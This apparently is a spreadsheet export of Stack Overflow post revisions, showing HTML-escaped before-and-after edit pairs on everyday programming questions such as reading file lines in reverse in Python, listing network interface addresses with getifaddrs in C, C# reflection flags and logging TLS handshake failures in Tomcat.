 &lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; changed map() to itertools.imap() in head(). &lt;strong&gt;Edit 2:&lt;/strong&gt; simplified reversed_blocks(). &lt;strong&gt;Edit 3:&lt;/strong&gt; avoid rescanning tail for newlines.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's an answer like MizardX's, but without its apparent problem of taking quadratic time in the worst case from rescanning the working string repeatedly for newlines as chunks are added.&lt;/p&gt; _x000D_
 &lt;p&gt; Compared to the activestate solution (which also seems to be quadratic), this doesn't blow up given an empty file, and does one seek per block read instead of two.&lt;/p&gt; _x000D_
 &lt;p&gt; Compared to spawning 'tail', this is self-contained. (But 'tail' is best if you have it.)&lt;/p&gt; _x000D_
 &lt;p&gt; Compared to grabbing a few kB off the end and hoping it's enough, this works for any line length.&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; os_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;reversed_lines&lt;/span&gt;(&lt;span class="hljs-params"&gt;file&lt;/span&gt;):&lt;/span&gt;_x000D_
    &lt;span class="hljs-string"&gt;"Generate the lines of file in reverse order."&lt;/span&gt;_x000D_
    tail = []           &lt;span class="hljs-comment"&gt;# Tail of the line whose head is not yet read.&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; block &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; reversed_blocks(file):_x000D_
        &lt;span class="hljs-comment"&gt;# A line is a list of strings to avoid quadratic concatenation.&lt;/span&gt;_x000D_
        &lt;span class="hljs-comment"&gt;# (And trying to avoid 1-element lists would complicate the code.)&lt;/span&gt;_x000D_
        linelists = [[line] &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; line &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; block.splitlines()]_x000D_
        linelists[-&lt;span class="hljs-number"&gt;1&lt;/span&gt;].extend(tail)_x000D_
        &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; linelist &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; &lt;span class="hljs-built_in"&gt;reversed&lt;/span&gt;(linelists[&lt;span class="hljs-number"&gt;1&lt;/span&gt;:]):_x000D_
            &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; &lt;span class="hljs-string"&gt;''&lt;/span&gt;.join(linelist)_x000D_
        tail = linelists[&lt;span class="hljs-number"&gt;0&lt;/span&gt;]_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; tail: &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; &lt;span class="hljs-string"&gt;''&lt;/span&gt;.join(tail)_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;reversed_blocks&lt;/span&gt;(&lt;span class="hljs-params"&gt;file, blocksize=&lt;span class="hljs-number"&gt;4096&lt;/span&gt;&lt;/span&gt;):&lt;/span&gt;_x000D_
    &lt;span class="hljs-string"&gt;"Generate blocks of file's contents in reverse order."&lt;/span&gt;_x000D_
    file.seek(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, os.SEEK_END)_x000D_
    here = file.tell()_x000D_
    &lt;span class="hljs-keyword"&gt;while&lt;/span&gt; &lt;span class="hljs-number"&gt;0&lt;/span&gt; &amp;lt; here:_x000D_
        delta = &lt;span class="hljs-built_in"&gt;min&lt;/span&gt;(blocksize, here)_x000D_
        file.seek(here - delta, os.SEEK_SET)_x000D_
        &lt;span class="hljs-keyword"&gt;yield&lt;/span&gt; file.read(delta)_x000D_
        here -= delta_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To use it as requested:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;from&lt;/span&gt; itertools &lt;span class="hljs-keyword"&gt;import&lt;/span&gt; islice_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;check_last_10_lines&lt;/span&gt;(&lt;span class="hljs-params"&gt;file, key&lt;/span&gt;):&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; line &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; islice(reversed_lines(file), &lt;span class="hljs-number"&gt;10&lt;/span&gt;):_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; line == key:_x000D_
            &lt;span class="hljs-built_in"&gt;print&lt;/span&gt; &lt;span class="hljs-string"&gt;'FOUND'&lt;/span&gt;_x000D_
            &lt;span class="hljs-keyword"&gt;break&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; changed map() to itertools.imap() in head(). &lt;strong&gt;Edit 2:&lt;/strong&gt; simplified reversed_blocks(). &lt;strong&gt;Edit 3:&lt;/strong&gt; avoid rescanning tail for newlines.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Darius Bacon</t>
  </si>
  <si>
    <t>Brian B</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;edit:&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; If you're using .NET Core 2.1 or later, don't bother reinventing the wheel! &lt;/span&gt;&lt;a href="https://stackoverflow.com/a/47458496/4077294"&gt;&lt;span class="diff-delete"&gt;There is now a built-in &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;HashCode&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; type to help you implement this function.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Original answer follows.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; I usually go with something like the implementation given in Josh Bloch's &lt;em&gt;fabulous&lt;/em&gt; &lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321356683" rel="nofollow noreferrer"&gt;Effective Java&lt;/a&gt;. It's fast and creates a pretty good hash which is unlikely to cause collisions. Pick two different prime numbers, e.g. 17 and 23, and do:&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I usually go with something like the implementation given in Josh Bloch's &lt;em&gt;fabulous&lt;/em&gt; &lt;a href="https://rads.stackoverflow.com/amzn/click/com/0321356683" rel="nofollow noreferrer"&gt;Effective Java&lt;/a&gt;. It's fast and creates a pretty good hash which is unlikely to cause collisions. Pick two different prime numbers, e.g. 17 and 23, and do:&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What I mean is to say is how do you communicate with a subject matter expert who needs a theory coded and tested?&lt;/p&gt; _x000D_
 &lt;p&gt; For example, weather simulation is a collaboration between meteorologists, computer scientists, and software engineers. The computer scientists and software engineers generally speak the same language, but he meteorologist is in a completely different world.&lt;/p&gt; _x000D_
 &lt;p&gt; How do you increase the level of communication and understanding between disciplines? And not necessarily just for weather, other sciences too.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Yeah, I know the title is a mouthful...&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; What I mean is to say is how do you communicate with a subject matter expert who needs a theory coded and tested?&lt;/p&gt; _x000D_
 &lt;p&gt; For example, weather simulation is a collaboration between meteorologists, computer scientists, and software engineers. The computer scientists and software engineers generally speak the same language, but he meteorologist is in a completely different world.&lt;/p&gt; _x000D_
 &lt;p&gt; How do you increase the level of communication and understanding between disciplines? And not necessarily just for weather, other sciences too.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>dacracot</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;I have&lt;/span&gt; a web service which&lt;span class="diff-delete"&gt; can&lt;/span&gt; return JSON.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; From within an iPhone application, how can I make an HTTP Post&lt;/span&gt; request&lt;span class="diff-delete"&gt; for&lt;/span&gt; a JSON &lt;span class="diff-delete"&gt;Object?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I've&lt;/span&gt; a web service&lt;span class="diff-add"&gt; running on server&lt;/span&gt; which return&lt;span class="diff-add"&gt; data either in XML format or&lt;/span&gt; JSON&lt;span class="diff-add"&gt; format&lt;/span&gt;.&lt;span class="diff-add"&gt; I wanted to&lt;/span&gt; request a JSON &lt;span class="diff-add"&gt;format but using HTTP Post method.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; any help greatly appreciated.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; thanks in advance.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If I understood your question correctly, you have known data structure and you are modifying data - not XML structure of file.&lt;/p&gt; _x000D_
 &lt;p&gt; Under these condition &lt;em&gt;and if performance is crucial&lt;/em&gt;, then you could try with direct text manipulation - skip XML parsing.&lt;/p&gt; _x000D_
 &lt;p&gt; Read from stream, use some fast text search algorithm e.g. &lt;a href="http://en.wikipedia.org/wiki/Boyer%E2%80%93Moore_string_search_algorithm" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Boyer-Moore&lt;/span&gt;&lt;/a&gt;, to find places where you need to modify data, do your modification and output data into another stream.&lt;/p&gt; _x000D_
 &lt;p&gt; This would be one-pass, no XML parsing, no in-memory XML tree building.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If I understood your question correctly, you have known data structure and you are modifying data - not XML structure of file.&lt;/p&gt; _x000D_
 &lt;p&gt; Under these condition &lt;em&gt;and if performance is crucial&lt;/em&gt;, then you could try with direct text manipulation - skip XML parsing.&lt;/p&gt; _x000D_
 &lt;p&gt; Read from stream, use some fast text search algorithm e.g. &lt;span class="diff-add"&gt;Boyer-Moore&lt;/span&gt;, to find places where you need to modify data, do your modification and output data into another stream.&lt;/p&gt; _x000D_
 &lt;p&gt; This would be one-pass, no XML parsing, no in-memory XML tree building.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Toon Krijthe</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Don't know if this works, but why don't you try &lt;code&gt;counter(&lt;span class="diff-delete"&gt;page&lt;/span&gt;)&lt;span class="diff-delete"&gt;+1&lt;/span&gt;&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Don't know if this works, but why don't you try &lt;code&gt;counter(&lt;span class="diff-add"&gt;page+1&lt;/span&gt;)&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Treb</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You've overwritten the default look-up flags, if you specify new flags you need to provide the all the info so that the property can be found. For example:&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Type t = typeof(T);_x000D_
t.GetProperty("company", BindingFlags.IgnoreCase |  BindingFlags.Public | BindingFlags.Instance)_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You've overwritten the default look-up flags, if you specify new flags you need to provide the all the info so that the property can be found. For example:&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;BindingFlags.IgnoreCase | BindingFlags.Public | BindingFlags.Instance&lt;/span&gt;&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Tomas Kubes</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I found the ioctl solution problematic on os x (which is POSIX compliant so should be similiar to linux). However getifaddress() will let you do the same thing easily, it works fine for me on os x 10.5 and should be the same below.&lt;/p&gt; _x000D_
 &lt;p&gt; I've done a quick example below which will print all of the machine's IPv4 address, (you should also check the getifaddrs was successful ie returns 0).&lt;/p&gt; _x000D_
 &lt;p&gt; I've updated it show IPv6 addresses too.&lt;/p&gt; _x000D_
 &lt;pre class="lang-cpp s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;      &lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;sys/types.h&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;ifaddrs.h&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;netinet/in.h&amp;gt;&lt;/span&gt; &lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt; &lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;arpa/inet.h&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt; &lt;span class="hljs-params"&gt;(&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; argc, &lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-keyword"&gt;char&lt;/span&gt; * argv[])&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;ifaddrs&lt;/span&gt; * &lt;span class="hljs-title"&gt;ifAddrStruct&lt;/span&gt;=&lt;/span&gt;&lt;span class="hljs-literal"&gt;NULL&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; * tmpAddrPtr=&lt;span class="hljs-literal"&gt;NULL&lt;/span&gt;;_x000D_
    _x000D_
    &lt;span class="hljs-built_in"&gt;getifaddrs&lt;/span&gt;(&amp;amp;ifAddrStruct);_x000D_
    _x000D_
    &lt;span class="hljs-keyword"&gt;while&lt;/span&gt; (ifAddrStruct!=&lt;span class="hljs-literal"&gt;NULL&lt;/span&gt;) {_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (ifAddrStruct-&amp;gt;ifa_addr-&amp;gt;sa_family==AF_INET) { &lt;span class="hljs-comment"&gt;// check it is IP4&lt;/span&gt;_x000D_
            &lt;span class="hljs-comment"&gt;// is a valid IP4 Address&lt;/span&gt;_x000D_
            tmpAddrPtr=&amp;amp;((struct sockaddr_in *)ifAddrStruct-&amp;gt;ifa_addr)-&amp;gt;sin_addr;_x000D_
            &lt;span class="hljs-keyword"&gt;char&lt;/span&gt; addressBuffer[INET_ADDRSTRLEN];_x000D_
            &lt;span class="hljs-built_in"&gt;inet_ntop&lt;/span&gt;(AF_INET, tmpAddrPtr, addressBuffer, INET_ADDRSTRLEN);_x000D_
            &lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"%s IP Address %s\n"&lt;/span&gt;, ifAddrStruct-&amp;gt;ifa_name, addressBuffer); _x000D_
        } &lt;span class="hljs-keyword"&gt;else&lt;/span&gt; &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (ifAddrStruct-&amp;gt;ifa_addr-&amp;gt;sa_family==AF_INET6) { &lt;span class="hljs-comment"&gt;// check it is IP6&lt;/span&gt;_x000D_
            &lt;span class="hljs-comment"&gt;// is a valid IP6 Address&lt;/span&gt;_x000D_
            tmpAddrPtr=&amp;amp;((struct sockaddr_in *)ifAddrStruct-&amp;gt;ifa_addr)-&amp;gt;sin_addr;_x000D_
            &lt;span class="hljs-keyword"&gt;char&lt;/span&gt; addressBuffer[INET6_ADDRSTRLEN];_x000D_
            &lt;span class="hljs-built_in"&gt;inet_ntop&lt;/span&gt;(AF_INET6, tmpAddrPtr, addressBuffer, INET6_ADDRSTRLEN);_x000D_
            &lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"%s IP Address %s\n"&lt;/span&gt;, ifAddrStruct-&amp;gt;ifa_name, addressBuffer); _x000D_
        } _x000D_
        ifAddrStruct=ifAddrStruct-&amp;gt;ifa_next;_x000D_
    }_x000D_
    &lt;span class="diff-delete"&gt;&lt;span class="hljs-built_in"&gt;freeifaddrs&lt;/span&gt;(ifAddrStruct);_x000D_
    &lt;/span&gt;&lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-number"&gt;0&lt;/span&gt;;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I found the ioctl solution problematic on os x (which is POSIX compliant so should be similiar to linux). However getifaddress() will let you do the same thing easily, it works fine for me on os x 10.5 and should be the same below.&lt;/p&gt; _x000D_
 &lt;p&gt; I've done a quick example below which will print all of the machine's IPv4 address, (you should also check the getifaddrs was successful ie returns 0).&lt;/p&gt; _x000D_
 &lt;p&gt; I've updated it show IPv6 addresses too.&lt;/p&gt; _x000D_
 &lt;pre class="lang-cpp s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;      &lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;sys/types.h&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;ifaddrs.h&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;netinet/in.h&amp;gt;&lt;/span&gt; &lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt; &lt;/span&gt;_x000D_
&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;include&lt;/span&gt; &lt;span class="hljs-meta-string"&gt;&amp;lt;arpa/inet.h&amp;gt;&lt;/span&gt;&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt; &lt;span class="hljs-params"&gt;(&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; argc, &lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-keyword"&gt;char&lt;/span&gt; * argv[])&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;struct&lt;/span&gt; &lt;span class="hljs-title"&gt;ifaddrs&lt;/span&gt; * &lt;span class="hljs-title"&gt;ifAddrStruct&lt;/span&gt;=&lt;/span&gt;&lt;span class="hljs-literal"&gt;NULL&lt;/span&gt;;_x000D_
    &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; * tmpAddrPtr=&lt;span class="hljs-literal"&gt;NULL&lt;/span&gt;;_x000D_
    _x000D_
    &lt;span class="hljs-built_in"&gt;getifaddrs&lt;/span&gt;(&amp;amp;ifAddrStruct);_x000D_
    _x000D_
    &lt;span class="hljs-keyword"&gt;while&lt;/span&gt; (ifAddrStruct!=&lt;span class="hljs-literal"&gt;NULL&lt;/span&gt;) {_x000D_
        &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (ifAddrStruct-&amp;gt;ifa_addr-&amp;gt;sa_family==AF_INET) { &lt;span class="hljs-comment"&gt;// check it is IP4&lt;/span&gt;_x000D_
            &lt;span class="hljs-comment"&gt;// is a valid IP4 Address&lt;/span&gt;_x000D_
            tmpAddrPtr=&amp;amp;((struct sockaddr_in *)ifAddrStruct-&amp;gt;ifa_addr)-&amp;gt;sin_addr;_x000D_
            &lt;span class="hljs-keyword"&gt;char&lt;/span&gt; addressBuffer[INET_ADDRSTRLEN];_x000D_
            &lt;span class="hljs-built_in"&gt;inet_ntop&lt;/span&gt;(AF_INET, tmpAddrPtr, addressBuffer, INET_ADDRSTRLEN);_x000D_
            &lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"%s IP Address %s\n"&lt;/span&gt;, ifAddrStruct-&amp;gt;ifa_name, addressBuffer); _x000D_
        } &lt;span class="hljs-keyword"&gt;else&lt;/span&gt; &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (ifAddrStruct-&amp;gt;ifa_addr-&amp;gt;sa_family==AF_INET6) { &lt;span class="hljs-comment"&gt;// check it is IP6&lt;/span&gt;_x000D_
            &lt;span class="hljs-comment"&gt;// is a valid IP6 Address&lt;/span&gt;_x000D_
            tmpAddrPtr=&amp;amp;((struct sockaddr_in *)ifAddrStruct-&amp;gt;ifa_addr)-&amp;gt;sin_addr;_x000D_
            &lt;span class="hljs-keyword"&gt;char&lt;/span&gt; addressBuffer[INET6_ADDRSTRLEN];_x000D_
            &lt;span class="hljs-built_in"&gt;inet_ntop&lt;/span&gt;(AF_INET6, tmpAddrPtr, addressBuffer, INET6_ADDRSTRLEN);_x000D_
            &lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"%s IP Address %s\n"&lt;/span&gt;, ifAddrStruct-&amp;gt;ifa_name, addressBuffer); _x000D_
        } _x000D_
        ifAddrStruct=ifAddrStruct-&amp;gt;ifa_next;_x000D_
    }_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-number"&gt;0&lt;/span&gt;;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Twelve47</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using Strawberry Perl which includes MinGW's GCC, I'm also making use of the GNU debugger GDB and Subversion. How can I have a single&lt;span class="diff-delete"&gt; light-weight&lt;/span&gt; development environment that would suit this (other than just UltraEdit, the command shell and IE), and how can I further enhance its features?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using Strawberry Perl which includes MinGW's GCC, I'm also making use of the GNU debugger GDB and Subversion. How can I have a single development environment that would suit this (other than just UltraEdit, the command shell and IE), and how can I further enhance its features?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Rob Kam</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can someone post a simple example of starting two (Object Oriented) threads in C++.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm looking for actual C++ thread objects that I can extend run methods on (or something similar) as opposed to calling a C-style thread library.&lt;/p&gt; _x000D_
 &lt;p&gt; Update - I left out any OS specific requests in the hopes that whoever replied would reply with cross platform libraries to use. I'm just making that explicit now.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Update 2 - Since this was put on hold as too broad (amazing since there is a current, specific, direct answer, upvoted over 400 times) I am updating to thank everyone who responded, especially with the C++11 answer, and before that, the boost answer.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can someone post a simple example of starting two (Object Oriented) threads in C++.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm looking for actual C++ thread objects that I can extend run methods on (or something similar) as opposed to calling a C-style thread library.&lt;/p&gt; _x000D_
 &lt;p&gt; Update - I left out any OS specific requests in the hopes that whoever replied would reply with cross platform libraries to use. I'm just making that explicit now.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mark Rotteveel</t>
  </si>
  <si>
    <t>Zak</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm running an application (web service) in &lt;code&gt;&lt;span class="diff-delete"&gt;tomcat&lt;/span&gt;&lt;/code&gt; with &lt;code&gt;&lt;span class="diff-delete"&gt;TLS&lt;/span&gt;&lt;/code&gt; enabled (with certificates both for the client and the server).&lt;/p&gt; _x000D_
 &lt;p&gt; I want that my application will be able to send audit message (logging) when &lt;code&gt;&lt;span class="diff-delete"&gt;TLS&lt;/span&gt;&lt;/code&gt; handshake fails. for example I want to log when:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;  - the client certificate is expired,_x000D_
  - the client certificate is unknown (not in the server trust store)_x000D_
  - any other  handshake failure_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Is there any event I can catch and handle in order to do that ?&lt;/p&gt; _x000D_
 &lt;p&gt;-- Yonatan&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; My application is web service based and is running in &lt;code&gt;&lt;span class="diff-delete"&gt;tomcat&lt;/span&gt;&lt;/code&gt;. &lt;code&gt;&lt;span class="diff-delete"&gt;Tomcat&lt;/span&gt;&lt;/code&gt; is handling all network and the &lt;code&gt;&lt;span class="diff-delete"&gt;TLS&lt;/span&gt;&lt;/code&gt; layers, and the application does not aware of that.&lt;/p&gt; _x000D_
 &lt;p&gt; As I don't open any socket myself, where should I catch this Exception ?&lt;/p&gt; _x000D_
 &lt;p&gt; â€“ Yonatan&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm running an application (web service) in &lt;span class="diff-add"&gt;tomcat&lt;/span&gt; with &lt;span class="diff-add"&gt;TLS&lt;/span&gt; enabled (with certificates both for the client and the server).&lt;/p&gt; _x000D_
 &lt;p&gt; I want that my application will be able to send audit message (logging) when &lt;span class="diff-add"&gt;TLS&lt;/span&gt; handshake fails. for example I want to log when:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; the client certificate is expired,&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; the client certificate is unknown (not in the server trust store)&lt;/span&gt;&lt;/li&gt; _x000D_
